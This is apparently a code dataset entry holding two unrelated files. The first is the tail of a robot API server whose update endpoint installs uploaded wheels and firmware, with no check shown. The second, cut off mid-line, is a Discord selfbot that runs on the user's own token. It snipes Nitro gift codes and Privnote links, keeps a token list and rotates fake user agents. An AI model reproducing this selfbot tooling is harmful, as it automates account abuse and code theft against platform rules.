and file fields in the body named "whl", "serverlib", and "fw". The "whl"
and "serverlib" files should be valid Python wheels to be installed ("whl"
is expected generally to be the API server wheel, and "serverlib" is
expected to be the ot2serverlib wheel. The "fw" file is expected to be a
Smoothie firmware hex file. The Python files are install using pip, and the
firmware file is flashed to the Smoothie board, then the files are deleted
and a success code is returned.
"""
log.debug('Update request received')
data = await request.post()
try:
res0 = await install_py(
data['whl'], request.loop)
reslist = [res0]
if 'serverlib' in data.keys():
res1 = await install_py(
data['serverlib'], request.loop)
reslist.append(res1)
if 'fw' in data.keys():
res2 = await install_smoothie_firmware(
data['fw'], request.loop)
reslist.append(res2)
res = {
'message': [r['message'] for r in reslist],
'filename': [r['filename'] for r in reslist]
}
status = 200
except Exception as e:
res = {'message': 'Exception {} raised by update of {}: {}'.format(
type(e), data, e.__traceback__)}
status = 500
return web.json_response(res, status=status)
async def update_firmware(request):
"""
This handler accepts a POST request with Content-Type: multipart/form-data
and a file field in the body named "hex". The file should be a valid HEX
image to be flashed to the LPC1769. The received file is flashed using
lpc21isp, and then deleted and a success code is returned.
"""
log.debug('Update Firmware request received')
data = await request.post()
try:
res = await install_smoothie_firmware(data['hex'], request.loop)
status = 200
except Exception as e:
log.exception("Exception during firmware update:")
res = {'message': 'Exception {} raised by update of {}: {}'.format(
type(e), data, e.__traceback__)}
status = 500
return web.json_response(res, status=status)
async def restart(request):
"""
Returns OK, then waits approximately 1 second and restarts container
"""
def wait_and_restart():
log.info('Restarting server')
sleep(1)
os.system('kill 1')
Thread(target=wait_and_restart).start()
return web.json_response({"message": "restarting"})
|
Ghost.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
MIT License
Copyright (c) 2022 Ben Tettmar
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import os
from re import T
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = "hide"
printSpaces = ""
if os.name == "nt":
os.system("cls")
# os.system("mode 100,25")
os.system("title Ghost")
if os.name == "posix":
os.system("clear")
print(" ")
print(f"{printSpaces}Loading Ghost...")
print(" ")
import sys
import subprocess
import logging
if not os.path.exists('logs/'):
os.makedirs('logs/')
print(printSpaces+"Made logs folder.")
open("logs/info.log", "w").write(" ")
print(printSpaces+"Resetting info log.")
open("logs/warning.log", "w").write(" ")
print(printSpaces+"Resetting warning log.")
open("logs/error.log", "w").write(" ")
print(printSpaces+"Resetting error log.")
open("logs/critical.log", "w").write(" ")
print(printSpaces+"Resetting critical log.")
print(" ")
logging.basicConfig(filename="logs/info.log", level=logging.INFO)
logging.basicConfig(filename="logs/warning.log", level=logging.WARNING)
logging.basicConfig(filename="logs/error.log", level=logging.ERROR)
logging.basicConfig(filename="logs/critical.log", level=logging.CRITICAL)
try:
# pythonVersion = float(str(sys.version_info[0])+"."+str(sys.version_info[1]))
# if pythonVersion < 3.8:
# input("You're not using a supported Python version.")
# exit()
# else:
# print("You're using a supported python version, " + str(pythonVersion))
def install(package):
os.system(f"{sys.executable} -m pip install {package}")
def uninstall(package):
os.system(f"{sys.executable} -m pip uninstall {package}")
if "discord.py" in sys.modules:
uninstall("discord.py")
if "discordselfbot" in sys.modules:
uninstall("discordselfbot")
try:
import discord
except ModuleNotFoundError:
install("discord.py-self")
try:
import pyPrivnote as pn
except ModuleNotFoundError:
install("pyPrivnote")
try:
import names
except ModuleNotFoundError:
install("names")
try:
import simplejson
except ModuleNotFoundError:
install("simplejson")
try:
import aiohttp
except ModuleNotFoundError:
install("aiohttp")
try:
from colour import Color
except ModuleNotFoundError:
install("colour")
try:
from termcolor import colored
except ModuleNotFoundError:
install("termcolor")
try:
from faker import Faker
except ModuleNotFoundError:
install("Faker")
if os.name == "nt":
try:
import plyer
except ModuleNotFoundError:
install("plyer")
try:
from sty import fg, bg, ef, rs, Style, RgbFg
except ModuleNotFoundError:
install("sty==1.0.0rc0")
try:
import colorama
except ModuleNotFoundError:
install("colorama")
try:
import discord_rpc
except ModuleNotFoundError:
install("discord-rpc.py")
try:
import requests
except ModuleNotFoundError:
install("requests")
try:
import uwuify
except ModuleNotFoundError:
install("uwuify")
try:
import numpy as np
except ModuleNotFoundError:
install("numpy")
try:
import discum
except ModuleNotFoundError:
install("discum")
try:
from discord_webhook import DiscordWebhook, DiscordEmbed
except ModuleNotFoundError:
install("discord-webhook")
try:
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, OperatingSystem
except ModuleNotFoundError:
install("random_user_agent")
try:
import GPUtil
except ModuleNotFoundError:
install("gputil")
try:
import psutil
except ModuleNotFoundError:
install("psutil")
try:
import PIL
except ModuleNotFoundError:
install("pillow")
try:
import pygame
except ModuleNotFoundError:
install("pygame")
# if os.name == "posix":
# if str(subprocess.check_output(["apt-cache", "policy", "libportaudio2"])).split("\\n")[1][2:].split(": ")[1] == "(none)":
# os.system("sudo apt-get install libportaudio2")
try:
import sounddevice
except ModuleNotFoundError:
install("sounddevice")
try:
import discord_emoji
except ModuleNotFoundError:
install("discord-emoji")
if sys.platform == "darwin":
try:
import pync
except ModuleNotFoundError:
install("pync")
if os.name == "nt":
try:
import wmi
except ModuleNotFoundError:
install("WMI")
import wmi
if os.name == "nt":
import plyer
try:
import tkinter
except:
pass
try:
import brainfuckery
except:
install("brainfuckery==1.0.1")
if sys.platform == "darwin":
import pync
import brainfuckery
import colorama
import discord_emoji
import threading
import pygame
import PIL
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, OperatingSystem
from discord_webhook import DiscordWebhook, DiscordEmbed
import discum
if os.name == "nt":
import winshell
import uwuify
import getpass
import mimetypes
import discord_rpc
from sty import fg, bg, ef, rs, Style, RgbFg
import discord
import json
import pyPrivnote as pn
import random
import asyncio
import requests
import aiohttp
import names
import string
import simplejson
import base64
import math
import time
import urllib
import urllib.request
import codecs
import platform
import psutil
import re
import ctypes
import ctypes.util
import GPUtil
from urllib.request import Request, urlopen
from colour import Color
from discord.ext import commands
from discord.utils import get
from termcolor import colored, cprint
from os.path import dirname, basename, isfile, join
from datetime import datetime, timedelta
import numpy as np
from faker import Faker
def update_config():
configJson = json.load(open("config.json"))
configFile = open("config.json", "r").read()
if ("riskmode" not in configFile):
print(f"{printSpaces}Adding risk mode to config.")
configJson["riskmode"] = bool(False)
if ("load_on_startup" not in configFile):
print(f"{printSpaces}Adding load on startup to config.")
configJson["load_on_startup"] = bool(False)
if ("giveaway_join_delay" not in configFile):
print(f"{printSpaces}Adding giveaway join delay to config.")
configJson["giveaway_join_delay"] = 15
if ("giveaway_sniper_ui" not in configFile):
print(printSpaces+"Adding giveaway sniper ui to config.")
configJson["giveaway_sniper_ui"] = False
if ("snipers" not in configFile):
configJson["snipers"] = {}
print(printSpaces+"Adding nitro sniper to config.")
configJson["snipers"]["nitro"] = bool(True)
print(printSpaces+"Adding privnote sniper to config.")
configJson["snipers"]["privnote"] = bool(True)
print(printSpaces+"Adding giveaway sniper to config.")
configJson["snipers"]["giveaway"] = bool(True)
if ("webhooks" not in configFile):
configJson["webhooks"] = {}
print(printSpaces+"Adding nitro webhook to config.")
configJson["webhooks"]["nitro"] = ""
print(printSpaces+"Adding privnote webhook to config.")
configJson["webhooks"]["privnote"] = ""
print(printSpaces+"Adding giveaway webhook to config.")
configJson["webhooks"]["giveaway"] = ""
if ("motd" not in configFile):
configJson["motd"] = {}
configJson["motd"]["custom"] = bool(False)
print(printSpaces+"Adding custom motd option to config.")
configJson["motd"]["custom_text"] = "Super Cool Custom MOTD"
print(printSpaces+"Adding custom motd text to config.")
if ("selfbot_detect" in configFile):
configJson.pop("selfbot_detect")
print(printSpaces+"Removing selfbot detect from config.")
if ("ghostping_detect" in configFile):
configJson.pop("ghostping_detect")
print(printSpaces+"Removing ghostping detect from config.")
if ("ghostping" not in configJson["webhooks"]):
configJson["webhooks"]["ghostping"] = ""
print(printSpaces+"Adding ghostping webhook to config.")
if ("friendsupdate" not in configJson["webhooks"]):
configJson["webhooks"]["friendsupdate"] = ""
print(printSpaces+"Adding friends update webhook to config.")
if ("dmtyping" not in configJson["webhooks"]):
configJson["webhooks"]["dmtyping"] = ""
print(printSpaces+"Adding DM typing webhook to config.")
if ("guildleave" not in configJson["webhooks"]):
configJson["webhooks"]["guildleave"] = ""
print(printSpaces+"Adding guild leave webhook to config.")
if ("selfbot" not in configJson["webhooks"]):
configJson["webhooks"]["selfbot"] = ""
print(printSpaces+"Adding selfbot webhook to config.")
if ("tickets" not in configJson["webhooks"]):
configJson["webhooks"]["tickets"] = ""
print(printSpaces+"Adding tickets webhook to config.")
if ("sounds" not in configFile):
configJson["sounds"] = bool(True)
print(printSpaces+"Adding sounds toggle to config.")
if ("detections" not in configFile):
configJson["detections"] = {}
configJson["detections"]["selfbot"] = bool(True)
print(printSpaces+"Adding selfbot detection to config.")
configJson["detections"]["ghostping"] = bool(True)
print(printSpaces+"Adding ghostping detection to config.")
configJson["detections"]["bans"] = bool(True)
print(printSpaces+"Adding ban detection to config.")
if ("deletedmessages" not in configJson["detections"]):
configJson["detections"]["deletedmessages"] = bool(False)
print(printSpaces+"Adding deleted messages detection to config.")
if ("webhookmodification" not in configJson["detections"]):
configJson["detections"]["webhookmodification"] = bool(True)
print(printSpaces+"Adding webhook modification detection to config.")
if ("friendsupdate" not in configJson["detections"]):
configJson["detections"]["friendsupdate"] = bool(True)
print(printSpaces+"Adding friends update detection to config.")
if ("dmtyping" not in configJson["detections"]):
configJson["detections"]["dmtyping"] = bool(True)
print(printSpaces+"Adding DM typing detection to config.")
if ("guildleave" not in configJson["detections"]):
configJson["detections"]["guildleave"] = bool(True)
print(printSpaces+"Adding guild leave detection to config.")
if ("embed_mode" not in configFile):
configJson["embed_mode"] = bool(False)
print(printSpaces+"Adding embed mode to config.")
if ("ignored_servers" not in configFile):
configJson["ignored_servers"] = {}
configJson["ignored_servers"]["nitro"] = []
print(printSpaces+"Adding nitro ignored servers to config.")
configJson["ignored_servers"]["privnote"] = []
print(printSpaces+"Adding privnote ignored servers to config.")
configJson["ignored_servers"]["giveaways"] = []
print(printSpaces+"Adding giveaways ignored servers to config.")
configJson["ignored_servers"]["ghostpings"] = []
print(printSpaces+"Adding ghostpings ignored servers to config.")
configJson["ignored_servers"]["selfbots"] = []
print(printSpaces+"Adding selfbots ignored servers to config.")
configJson["ignored_servers"]["bans"] = []
print(printSpaces+"Adding bans ignored servers to config.")
configJson["ignored_servers"]["deletedmessages"] = []
print(printSpaces+"Adding deletedmessages ignored servers to config.")
if ("webhookmodifications" not in configJson["ignored_servers"]):
configJson["ignored_servers"]["webhookmodifications"] = []
print(printSpaces+"Adding webhook modification ignored servers to config.")
if ("tickets" not in configJson["snipers"]):
configJson["snipers"]["tickets"] = bool(True)
print(printSpaces+"Adding ticket sniper to config.")
if ("tickets" not in configJson["ignored_servers"]):
configJson["ignored_servers"]["tickets"] = []
print(printSpaces+"Adding tickets ignored servers to config.")
if ("guildleave" not in configJson["ignored_servers"]):
configJson["ignored_servers"]["guildleave"] = []
print(printSpaces+"Adding guild leave ignored servers to config.")
if ("api_keys" not in configFile):
print(printSpaces+"Adding api keys to config.")
configJson["api_keys"] = {}
configJson["api_keys"]["hypixel"] = ""
configJson["api_keys"]["tenor"] = ""
if ("afkmode" not in configFile):
print(printSpaces+"Adding afkmode to config.")
configJson["afkmode"] = {}
configJson["afkmode"]["enabled"] = False
configJson["afkmode"]["replymessage"] = "im currently afk :/"
if ("toastnotifications" not in configFile):
print(printSpaces+"Adding toast notifications to config.")
configJson["toastnotifications"] = True
json.dump(configJson, open("config.json", "w"), sort_keys=False, indent=4)
configJson = json.load(open("config.json"))
configFile = open("config.json", "r").read()
if ("load_on_startup" in configFile):
configJson.pop("load_on_startup")
print(printSpaces+"Removing load on startup from config.")
json.dump(configJson, open("config.json", "w"), sort_keys=False, indent=4)
if not os.path.exists('pytoexe/'): os.makedirs('pytoexe/');
if not os.path.exists('privnote-saves/'): os.makedirs('privnote-saves/');
if not os.path.exists('scripts/'): os.makedirs('scripts/');
if not os.path.exists('data/'): os.makedirs('data/');
if not os.path.exists('themes/'): os.makedirs('themes/');
if not os.path.exists('sounds/'): os.makedirs('sounds/');
if not os.path.isfile("data/icon.png"): open("data/icon.png", "wb").write(requests.get("https://raw.githubusercontent.com/GhostSelfbot/Branding/main/ghost.png", allow_redirects=True).content)
# if not os.path.isfile('icon.ico'): open('icon.ico', 'wb').write(requests.get('https://ghost.cool/favicon.ico', allow_redirects=True).content);
# if not os.path.isfile('sounds/connected.mp3'): open('sounds/connected.mp3', 'wb').write(requests.get('https://ghost.cool/assets/sounds/connected.mp3', allow_redirects=True).content);
# if not os.path.isfile('sounds/error.mp3'): open('sounds/error.mp3', 'wb').write(requests.get('https://ghost.cool/assets/sounds/error.mp3', allow_redirects=True).content);
# if not os.path.isfile('sounds/notification.mp3'): open('sounds/notification.mp3', 'wb').write(requests.get('https://ghost.cool/assets/sounds/notification.mp3', allow_redirects=True).content);
# if not os.path.isfile('sounds/success.mp3'): open('sounds/success.mp3', 'wb').write(requests.get('https://ghost.cool/assets/sounds/success.mp3', allow_redirects=True).content);
# if not os.path.isfile('sounds/giveaway-win.mp3'): open('sounds/giveaway-win.mp3', 'wb').write(requests.get('https://ghost.cool/assets/sounds/giveaway-win.mp3', allow_redirects=True).content);
# if not os.path.exists('trump-tweets/'): os.makedirs('trump-tweets/');
# if not os.path.exists('trump-tweets/assets'): os.makedirs('trump-tweets/assets');
# if not os.path.isfile('trump-tweets/assets/bg.png'):
# dtrumpbg = 'https://bennyware.xyz/files/dtrumptweetbg.png'
# dtrumpbg_r = requests.get(dtrumpbg, allow_redirects=True)
# open('trump-tweets/assets/bg.png', 'wb').write(dtrumpbg_r.content)
# if not os.path.isfile('trump-tweets/assets/roboto.ttf'):
# font = 'https://bennyware.xyz/files/roboto.ttf'
# font_r = requests.get(font, allow_redirects=True)
# open('trump-tweets/assets/roboto.ttf', 'wb').write(font_r.content)
# open('data/icon.png', 'wb').write(requests.get('http://ghost.cool/assets/icon.png', allow_redirects=True).content)
if not os.path.isfile('config.json'):
f = open('config.json', "w")
f.write("""
{
"token": "",
"prefix": ".",
"delete_timeout": 15,
"theme": "Ghost"
}
""")
f.close()
if not os.path.isfile('giveawaybots.json'):
f = codecs.open('giveawaybots.json', "w", encoding="UTF-8")
f.write("""
{
"294882584201003009": "🎉",
"396464677032427530": "🎉",
"720351927581278219": "🎉",
"582537632991543307": "🎉"
}
""")
f.close()
if not os.path.isfile('customcommands.json'):
f = open('customcommands.json', "w")
f.write("""
{
"cmd1": "this is cmd1",
"cmd2": "this is cmd2"
}
""")
f.close()
if not os.path.isfile('richpresence.json'):
f = open('richpresence.json', 'w')
f.write("""
{
"enabled": true,
"client_id": 807369019744059403,
"details": "Using Ghost selfbot...",
"state": "",
"large_image_key": "icon",
"large_image_text": "ghost.cool"
}
""")
f.close()
if os.path.isfile("richpresence.json"):
jsonFile = json.load(open("richpresence.json"))
if jsonFile["client_id"] == 807369019744059403:
jsonFile["client_id"] = 877223591828136006
if jsonFile["details"] == "Using Ghost selfbot...":
jsonFile["details"] = "Using Ghost..."
if "small_image_key" not in jsonFile:
jsonFile["small_image_key"] = "small"
if "small_image_text" not in jsonFile:
jsonFile["small_image_text"] = "best sb for £2"
json.dump(jsonFile, open("richpresence.json", "w"), sort_keys=False, indent=4)
if not os.path.isfile('themes/Ghost.json'):
f = open('themes/Ghost.json', "w")
f.write("""
{
"embedtitle": "Ghost",
"embedcolour": "#3B79FF",
"consolecolour": "#3B79FF",
"embedfooter": "ghost.cool",
"embedfooterimage": "https://ghost.cool/assets/icon.gif",
"globalemoji": ":blue_heart:",
"embedimage": "https://ghost.cool/assets/icon.gif"
}
""")
f.close()
if not os.path.isfile('data/personal-pins.json'):
f = open('data/personal-pins.json', "w")
f.write("{}")
f.close()
if not os.path.isfile('data/tokens.txt'):
f = open('data/tokens.txt', "w")
f.close()
if not os.path.isfile('data/rickroll.txt'):
f = open('data/rickroll.txt', "w")
f.write("""We're no strangers to love
You know the rules and so do I
A full commitment's what I'm thinking of
You wouldn't get this from any other guy
I just wanna tell you how I'm feeling
Gotta make you understand
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
We've known each other for so long
Your heart's been aching but you're too shy to say it
Inside we both know what's been going on
We know the game and we're gonna play it
And if you ask me how I'm feeling
Don't tell me you're too blind to see
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
Never gonna give, never gonna give
(Give you up)
(Ooh) Never gonna give, never gonna give
(Give you up)
We've known each other for so long
Your heart's been aching but you're too shy to say it
Inside we both know what's been going on
We know the game and we're gonna play it
I just wanna tell you how I'm feeling
Gotta make you understand
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt...""")
f.close()
if not os.path.isfile("scripts/consolecommand-example.py"):
f = open("scripts/consolecommand-example.py", "w")
f.write("""
@Ghost.command(name="consolecommand", description="console command test", usage="consoletest", aliases=["consoleCommand-consoletest"])
async def consoletest(ctx):
print("This is a command that can be executed in the console.")
print("You can create this commands by adding consoleCommand-{commandname} in the commands aliases.")
print("")
print("Any command that has that in the aliases will be able to be executed in the console and in discord so prints will be better.")
print("FYI: Arguments currently are not possible.")
""")
f.close()
if not os.path.isfile('scripts/example.py'):
f = open('scripts/example.py', "w")
f.write('''
@Ghost.command(name="example", description="Example custom script.", usage="example")
async def example(Ghost):
exampleEmbed = discord.Embed(
title="Example Embed",
description="""
An example embed to display what you can do in scripts.
Check `scripts/example.py` to see the code!
** **
Ghost scripts are all created in python using discord.py so you can use any feature from discord.py.
""",
color=__embedcolour__
)
exampleEmbed.add_field(name="Variables", value="""
**\_\_embedtitle\_\_** : Theme's embed title.
**\_\_embedcolour\_\_** : Theme's embed colour.
**\_\_embedfooter\_\_** : Theme's embed footer.
**\_\_embedimage\_\_** : Theme's embed image url.
**\_\_embedfooterimage\_\_** : Theme's embed footer image url.
**\_\_embedemoji\_\_** : Theme's global emoji.
**\_\_deletetimeout\_\_** : Config delete timeout (seconds).
""")
exampleEmbed.set_thumbnail(url=__embedimage__)
exampleEmbed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
await Ghost.send("Hello World!", embed=exampleEmbed)
''')
f.close()
if json.load(open("config.json"))["token"] == "":
os.system("cls")
os.system("clear")
print("")
print("Please input your Discord token below.".center(os.get_terminal_size().columns))
print("")
token = input()
config = json.load(open("config.json"))
config["token"] = (token)
json.dump(config, open('config.json', 'w'), sort_keys=False, indent=4)
ccmd_file = open('customcommands.json')
ccmd = json.load(ccmd_file)
def updateTheme(theme):
themeJson = json.load(open(f"themes/{theme}"))
if "consolecolour" not in themeJson:
themeJson["consolecolour"] = "#3B79FF"
if "consolemode" not in themeJson:
themeJson["consolemode"] = "new"
if "embedlargeimage" not in themeJson:
themeJson["embedlargeimage"] = ""
json.dump(themeJson, open(f"themes/{theme}", "w"), sort_keys=False, indent=4)
for theme in os.listdir("themes"):
if theme.endswith(".json"):
updateTheme(theme)
update_config()
CONFIG = json.load(open("config.json"))
GIVEAWAYBOTS = json.load(codecs.open("giveawaybots.json", encoding="UTF-8"))
__token__ = CONFIG["token"]
__prefix__ = CONFIG["prefix"]
# __loadonstartup__ = CONFIG["load_on_startup"]
__deletetimeout__ = CONFIG["delete_timeout"]
__theme__ = CONFIG["theme"]
__sounds__ = CONFIG["sounds"]
__riskmode__ = CONFIG["riskmode"]
__nitrosniper__ = CONFIG["snipers"]["nitro"]
__privnotesniper__ = CONFIG["snipers"]["privnote"]
__giveawaysniper__ = CONFIG["snipers"]["giveaway"]
__giveawaysniperui__ = CONFIG["giveaway_sniper_ui"]
__ticketsniper__ = CONFIG["snipers"]["tickets"]
__nitrowebhook__ = CONFIG["webhooks"]["nitro"]
__privnotewebhook__ = CONFIG["webhooks"]["privnote"]
__giveawaywebhook__ = CONFIG["webhooks"]["giveaway"]
__ghostpingwebhook__ = CONFIG["webhooks"]["ghostping"]
__friendsupdatewebhook__ = CONFIG["webhooks"]["friendsupdate"]
__dmtypingwebhook__ = CONFIG["webhooks"]["dmtyping"]
__guildleavewebhook__ = CONFIG["webhooks"]["guildleave"]
__selfbotwebhook__ = CONFIG["webhooks"]["selfbot"]
__ticketswebhook__ = CONFIG["webhooks"]["tickets"]
__giveawayjoindelay__ = CONFIG["giveaway_join_delay"]
__custommotd__ = CONFIG["motd"]["custom"]
__custommotdtext__ = CONFIG["motd"]["custom_text"]
__selfbotdetect__ = CONFIG["detections"]["selfbot"]
__ghostpingdetect__ = CONFIG["detections"]["ghostping"]
__bandetect__ = CONFIG["detections"]["bans"]
__deletedmessagesdetect__ = CONFIG["detections"]["deletedmessages"]
__webhookmodificationdetect__ = CONFIG["detections"]["webhookmodification"]
__friendsupdatedetect__ = CONFIG["detections"]["friendsupdate"]
__dmtypingdetect__ = CONFIG["detections"]["dmtyping"]
__guildleavedetect__ = CONFIG["detections"]["guildleave"]
THEME = json.load(open(f"themes/{__theme__}.json"))
__embedtitle__ = THEME["embedtitle"]
__embedcolour__ = int(THEME["embedcolour"].replace('#', '0x'), 0)
__embedcolourraw__ = THEME["embedcolour"]
__embedfooter__ = THEME["embedfooter"]
__embedemoji__ = THEME["globalemoji"]
__embedimage__ = THEME["embedimage"]
__embedlargeimage__ = THEME["embedlargeimage"]
__embedfooterimage__ = THEME["embedfooterimage"]
__embedmode__ = ""
__consolemode__ = THEME["consolemode"]
__ignoredservers__ = CONFIG["ignored_servers"]
__consolecolour__ = THEME["consolecolour"]
__ghostloaded__ = False
__guildleaveignoredservers__ = CONFIG["ignored_servers"]["guildleave"]
nsfwTypes = ["boobs", "ass", "hentai", "porngif", "pussy", "tits", "tittydrop", "tittypop", "titty", "femboy"]
typinghistory = {}
now = datetime.now()
fake = Faker()
def getCurrentTime():
return datetime.now().strftime("%H:%M:%S")
def print_important(message):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cPurple}[IMPORTANT] {fg.cWhite}{message}")
def print_info(message):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cYellow}[INFORMATION] {fg.cWhite}{message}")
def print_cmd(command):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.consoleColour}[COMMAND] {fg.cWhite}{command}")
def print_sharecmd(author, command):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.consoleColour}[SHARE COMMAND] {fg.cWhite}({author}) {command}")
def print_error(error):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cRed}[ERROR] {fg.cWhite}{error}")
def print_detect(message):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cPink}[DETECT] {fg.cWhite}{message}")
def print_sniper(message):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cOrange}[SNIPER] {fg.cWhite}{message}")
def print_sniper_info(firstmessage, secondmessage):
spaces = ""
# for i in range(len(f"[{getCurrentTime()}]")):
# spaces += " "
print(f"{printSpaces}{spaces} {fg.cYellow}{firstmessage}: {fg.cGrey}{secondmessage}")
def is_me(m):
return m.author == Ghost.user
def restart_bot():
python = sys.executable
os.execl(python, python, * sys.argv)
def close_bot():
os.system("taskkill /IM Ghost.exe")
def is_windows():
return os.name == "nt"
def is_linux():
return os.name == "posix"
def GetUUID():
if is_windows():
cmd = 'wmic csproduct get uuid'
uuid = str(subprocess.check_output(cmd))
pos1 = uuid.find("\\n")+2
uuid = uuid[pos1:-15]
elif is_linux():
uuid = str(subprocess.Popen(["dmidecode", "-s", "system-uuid"], stdout=subprocess.PIPE).communicate()[0]).replace("b'", "").replace("\\n'", "")
return uuid
# Found: https://stackoverflow.com/a/64676639
def hex_to_rgb(hex_string):
r_hex = hex_string[1:3]
g_hex = hex_string[3:5]
b_hex = hex_string[5:7]
red = int(r_hex, 16)
green = int(g_hex, 16)
blue = int(b_hex, 16)
return red, green, blue
def get_nsfw(type):
types = nsfwTypes
if type not in types:
return "Invalid type."
else:
for type2 in types:
if type == type2:
request = requests.get(f"https://www.reddit.com/r/{type2}/random.json", headers={'User-agent': get_random_user_agent()}).json()
url = request[0]["data"]["children"][0]["data"]["url"]
if "redgifs" in str(url):
url = request[0]["data"]["children"][0]["data"]["preview"]["reddit_video_preview"]["fallback_url"]
return url
def get_nsfw_custom_type(type):
request = requests.get(f"https://www.reddit.com/r/{type}/random.json", headers={'User-agent': get_random_user_agent()}).json()
url = request[0]["data"]["children"][0]["data"]["url"]
if "redgifs" in str(url):
url = request[0]["data"]["children"][0]["data"]["preview"]["reddit_video_preview"]["fallback_url"]
return url
def send_notification(title, message, duration):
if CONFIG["toastnotifications"]:
if sys.platform == "win32":
plyer.notification.notify(
title=title,
message=message,
app_name="Ghost",
app_icon="icon.ico",
timeout=duration,
toast=True
)
elif sys.platform == "darwin":
pync.notify(message, title=title)
def claim_nitro(code, userToken):
URL = f'https://discordapp.com/api/v6/entitlements/gift-codes/{code}/redeem'
result = requests.post(URL, headers={'Authorization': userToken}).text
if 'nitro' in result:
return "Valid Code"
else:
return "Invalid Code"
def read_privnote(url):
content = pn.read_note(link=url)
return content
def get_random_user_agent():
userAgents = ["Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3075.83 Safari/537.32", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.1", "Mozilla/5.0 (Windows NT 8.0; WOW64) AppleWebKit/536.24 (KHTML, like Gecko) Chrome/32.0.2019.89 Safari/536.24", "Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.41 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3058.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3258.0 Safari/537.36", "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36", "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2599.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.35 (KHTML, like Gecko) Chrome/27.0.1453.0 Safari/537.35", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.139 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.0.9757 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.1", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3258.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.1", "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2151.2 Safari/537.36", "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1204.0 Safari/537.1", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/67.0.3387.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 